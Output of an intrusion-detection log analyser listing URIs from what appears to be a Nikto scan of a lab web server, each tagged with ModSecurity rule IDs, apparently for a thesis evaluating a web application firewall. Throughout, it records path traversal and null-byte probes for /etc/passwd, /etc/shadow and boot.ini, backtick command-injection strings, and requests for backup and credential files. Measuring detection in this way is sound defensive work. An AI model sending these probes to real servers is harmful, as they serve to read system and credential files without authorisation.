# ms-inspectorlog v3.5
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/dit/Downloads/inspectorlog/ms-inspectorlog -l interesting_file.uri -t list -r /home/dit/Downloads/inspectorlog/etc/basic_rules.conf -o /home/dit/TFG/inspectorlog/modsecurity/web_estatica/owasp/opensource/nikto/interesting_file.clean
Packet [20]	Uri [/web/A6eNJSjz.conf]	Nattacks [1 ]	Signatures	[920440]
Packet [21]	Uri [/web/A6eNJSjz.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [29]	Uri [/web/A6eNJSjz.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [30]	Uri [/web/A6eNJSjz.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [31]	Uri [/web/A6eNJSjz.log]	Nattacks [1 ]	Signatures	[920440]
Packet [42]	Uri [/web/A6eNJSjz.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [50]	Uri [/web/A6eNJSjz.bak]	Nattacks [1 ]	Signatures	[920440]
Packet [54]	Uri [/web/A6eNJSjz.cfg]	Nattacks [1 ]	Signatures	[920440]
Packet [66]	Uri [/web/A6eNJSjz.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [71]	Uri [/web/A6eNJSjz.old]	Nattacks [1 ]	Signatures	[920440]
Packet [73]	Uri [/web/A6eNJSjz.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [80]	Uri [/web/A6eNJSjz.db]	Nattacks [1 ]	Signatures	[920440]
Packet [88]	Uri [/web/A6eNJSjz.bat]	Nattacks [1 ]	Signatures	[920440]
Packet [91]	Uri [/web/A6eNJSjz.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [127]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [128]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [129]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [130]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/HASH(0x558c240dd4a8)%00]	Nattacks [13 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930110]	[933161]	[942450]	[942460]
Packet [131]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini%00]	Nattacks [10 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[942460]
Packet [132]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini%00]	Nattacks [10 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[942460]
Packet [152]	Uri [/web/101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [153]	Uri [/web/101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [162]	Uri [/web/1921681101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [163]	Uri [/web/1921681101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [172]	Uri [/web/192_168_1_101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [173]	Uri [/web/192_168_1_101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [182]	Uri [/web/site.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [183]	Uri [/web/site.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [200]	Uri [/web/192.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [201]	Uri [/web/192.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [218]	Uri [/web/192_168_1_101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [219]	Uri [/web/192_168_1_101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [222]	Uri [/web/192.168.1.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [223]	Uri [/web/192.168.1.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [234]	Uri [/web/192.168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [235]	Uri [/web/192.168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [258]	Uri [/web/192.168.1.101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [259]	Uri [/web/192.168.1.101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [260]	Uri [/web/192.168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [261]	Uri [/web/192.168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [280]	Uri [/web/168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [281]	Uri [/web/168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [286]	Uri [/web/1921681.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [287]	Uri [/web/1921681.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [296]	Uri [/web/backup.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [297]	Uri [/web/backup.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [298]	Uri [/web/backup.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [299]	Uri [/web/backup.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [300]	Uri [/web/192.168.1.101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [301]	Uri [/web/192.168.1.101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [310]	Uri [/web/1921681.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [311]	Uri [/web/1921681.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [312]	Uri [/web/192168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [313]	Uri [/web/192168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [314]	Uri [/web/192168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [315]	Uri [/web/192168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [340]	Uri [/web/1921681101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [341]	Uri [/web/1921681101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [346]	Uri [/web/1.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [347]	Uri [/web/1.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [366]	Uri [/web/168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [367]	Uri [/web/168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [372]	Uri [/web/site.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [373]	Uri [/web/site.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [400]	Uri [/web/101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [401]	Uri [/web/101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [420]	Uri [/web/1.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [421]	Uri [/web/1.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [458]	Uri [/web/192.168.1.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [459]	Uri [/web/192.168.1.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [462]	Uri [/web/192.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [463]	Uri [/web/192.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [575]	Uri [/web/../../../../../../../../../../../../etc/shadow]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [589]	Uri [/web/scripts/samples/details.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [626]	Uri [/web/ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C]	Nattacks [1 ]	Signatures	[920440]
Packet [627]	Uri [/web/sqldump.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [628]	Uri [/web/structure.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [636]	Uri [/web/sqlnet.log]	Nattacks [1 ]	Signatures	[920440]
Packet [637]	Uri [/web/.psql_history]	Nattacks [1 ]	Signatures	[930130]
Packet [640]	Uri [/web/access.log]	Nattacks [1 ]	Signatures	[920440]
Packet [701]	Uri [/web/ccbill/secure/ccbill.log]	Nattacks [1 ]	Signatures	[920440]
Packet [728]	Uri [/web/dan_o.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [784]	Uri [/web/HyperStat/stat_what.log]	Nattacks [1 ]	Signatures	[920440]
Packet [785]	Uri [/web/hyperstat/stat_what.log]	Nattacks [1 ]	Signatures	[920440]
Packet [866]	Uri [/web/orders/mountain.cfg]	Nattacks [1 ]	Signatures	[920440]
Packet [867]	Uri [/web/orders/orders.log]	Nattacks [1 ]	Signatures	[920440]
Packet [904]	Uri [/web/pwd.db]	Nattacks [1 ]	Signatures	[920440]
Packet [937]	Uri [/web/ss.cfg]	Nattacks [1 ]	Signatures	[920440]
Packet [1028]	Uri [/web/carbo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1040]	Uri [/web/scripts/samples/ctguestb.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [1050]	Uri [/web/cgi-dos/args.bat]	Nattacks [1 ]	Signatures	[920440]
Packet [1091]	Uri [/web/boilerplate.asp?NFuse_Template=../../boot.ini&amp;NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [1128]	Uri [/web/emumail.cgi?type=.%00]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [1144]	Uri [/web/forum-ra.asp?n=../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1145]	Uri [/web/forum-ra.asp?n=../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1146]	Uri [/web/forum-ra.asp?n=/../../../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [1147]	Uri [/web/forum-ra.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini]	Nattacks [5 ]	Signatures	[930110]	[930110]	[930120]	[942370]	[942460]
Packet [1148]	Uri [/web/forum-ra.asp?n=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1149]	Uri [/web/forum-ra.asp?n=/etc/passwd%00]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [1150]	Uri [/web/forum-ra.asp?n=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [1151]	Uri [/web/forum-ra_professionnel.asp?n=%60/etc/passwd%60]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [1152]	Uri [/web/forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1153]	Uri [/web/forum-ra_professionnel.asp?n=../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [1154]	Uri [/web/forum-ra_professionnel.asp?n=/....../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [1155]	Uri [/web/forum-ra_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [1156]	Uri [/web/forum-ra_professionnel.asp?n=/../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1157]	Uri [/web/forum-ra_professionnel.asp?n=/../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1158]	Uri [/web/forum-ra_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini]	Nattacks [5 ]	Signatures	[930110]	[930110]	[930120]	[942370]	[942460]
Packet [1159]	Uri [/web/forum-ra_professionnel.asp?n=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1160]	Uri [/web/forum-ra_professionnel.asp?n=/etc/passwd%00]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [1161]	Uri [/web/forum-ra_professionnel.asp?n=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [1162]	Uri [/web/forum.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.]	Nattacks [9 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]	[942310]	[942430]	[942490]	[942431]
Packet [1163]	Uri [/web/forum.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [14 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942431]	[942460]
Packet [1164]	Uri [/web/forum.asp?n=../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [8 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[942431]	[942460]
Packet [1165]	Uri [/web/forum.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [3 ]	Signatures	[930120]	[942431]	[942460]
Packet [1166]	Uri [/web/forum.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [8 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[942431]	[942460]
Packet [1167]	Uri [/web/forum.asp?n=/../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [9 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942431]	[942460]
Packet [1168]	Uri [/web/forum.asp?n=/../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [9 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942431]	[942460]
Packet [1169]	Uri [/web/forum.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [7 ]	Signatures	[930110]	[930110]	[930120]	[942370]	[942430]	[942431]	[942460]
Packet [1170]	Uri [/web/forum.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [6 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]	[942431]
Packet [1171]	Uri [/web/forum.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [3 ]	Signatures	[930120]	[932160]	[942431]
Packet [1172]	Uri [/web/forum.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.]	Nattacks [2 ]	Signatures	[930120]	[942431]
Packet [1177]	Uri [/web/forum1.asp?n=%60/etc/passwd%60&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [1179]	Uri [/web/forum1.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1180]	Uri [/web/forum1.asp?n=../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [1181]	Uri [/web/forum1.asp?n=/....../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [1182]	Uri [/web/forum1.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [1183]	Uri [/web/forum1.asp?n=/../../../../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1184]	Uri [/web/forum1.asp?n=/../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1185]	Uri [/web/forum1.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [5 ]	Signatures	[930110]	[930110]	[930120]	[942370]	[942460]
Packet [1186]	Uri [/web/forum1.asp?n=/etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [1187]	Uri [/web/forum1.asp?n=/etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1188]	Uri [/web/forum1.asp?n=1753&amp;nn=%60/etc/passwd%60]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [1190]	Uri [/web/forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1191]	Uri [/web/forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1192]	Uri [/web/forum1.asp?n=1753&amp;nn=/....../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [1193]	Uri [/web/forum1.asp?n=1753&amp;nn=/..../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [1194]	Uri [/web/forum1.asp?n=1753&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [1195]	Uri [/web/forum1.asp?n=1753&amp;nn=/.\"./.\"./.\"./.\"./.\"./boot.ini]	Nattacks [5 ]	Signatures	[930110]	[930110]	[930120]	[942370]	[942460]
Packet [1196]	Uri [/web/forum1.asp?n=1753&amp;nn=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1197]	Uri [/web/forum1.asp?n=1753&amp;nn=/etc/passwd%00]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [1198]	Uri [/web/forum1.asp?n=1753&amp;nn=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [1199]	Uri [/web/forum1.asp?n=c:\boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [1 ]	Signatures	[930120]
Packet [1200]	Uri [/web/forum1_professionnel.asp?n=%60/etc/passwd%60&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [1202]	Uri [/web/forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1203]	Uri [/web/forum1_professionnel.asp?n=/....../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [1204]	Uri [/web/forum1_professionnel.asp?n=/.../.../.../.../.../.../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [1205]	Uri [/web/forum1_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [1206]	Uri [/web/forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1207]	Uri [/web/forum1_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [5 ]	Signatures	[930110]	[930110]	[930120]	[942370]	[942460]
Packet [1208]	Uri [/web/forum1_professionnel.asp?n=/etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [1209]	Uri [/web/forum1_professionnel.asp?n=/etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1210]	Uri [/web/forum1_professionnel.asp?n=1771&amp;nn=%60/etc/passwd%60&amp;page=1]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [1212]	Uri [/web/forum1_professionnel.asp?n=1771&amp;nn=../../../../../../../../../etc/passwd%00&amp;page=1]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1213]	Uri [/web/forum1_professionnel.asp?n=1771&amp;nn=/....../boot.ini&amp;page=1]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [1214]	Uri [/web/forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;page=1]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [1215]	Uri [/web/forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../etc/passwd&amp;page=1]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1216]	Uri [/web/forum1_professionnel.asp?n=1771&amp;nn=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;page=1]	Nattacks [5 ]	Signatures	[930110]	[930110]	[930120]	[942370]	[942460]
Packet [1217]	Uri [/web/forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd%00&amp;page=1]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [1218]	Uri [/web/forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd&amp;page=1]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1219]	Uri [/web/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=%60/etc/passwd%60]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [1221]	Uri [/web/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=../../../../../../../../../etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1222]	Uri [/web/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/....../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [1223]	Uri [/web/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/..../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [1224]	Uri [/web/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.../.../.../.../.../.../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [1225]	Uri [/web/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../../../../../../../../../../../boot.ini]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [1226]	Uri [/web/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1227]	Uri [/web/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.\"./.\"./.\"./.\"./.\"./boot.ini]	Nattacks [5 ]	Signatures	[930110]	[930110]	[930120]	[942370]	[942460]
Packet [1228]	Uri [/web/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1229]	Uri [/web/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd%00]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [1230]	Uri [/web/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [1231]	Uri [/web/forum1_professionnel.asp?n=1771&amp;nn=c:\boot.ini&amp;page=1]	Nattacks [1 ]	Signatures	[930120]
Packet [1232]	Uri [/web/forum1_professionnel.asp?n=c:\boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [1 ]	Signatures	[930120]
Packet [1233]	Uri [/web/forum_arc.asp?n=%60/etc/passwd%60|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.]	Nattacks [9 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]	[942310]	[942430]	[942490]	[942431]
Packet [1234]	Uri [/web/forum_arc.asp?n=../../../../../../../../../etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [14 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942431]	[942460]
Packet [1235]	Uri [/web/forum_arc.asp?n=/....../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.]	Nattacks [3 ]	Signatures	[930120]	[942431]	[942460]
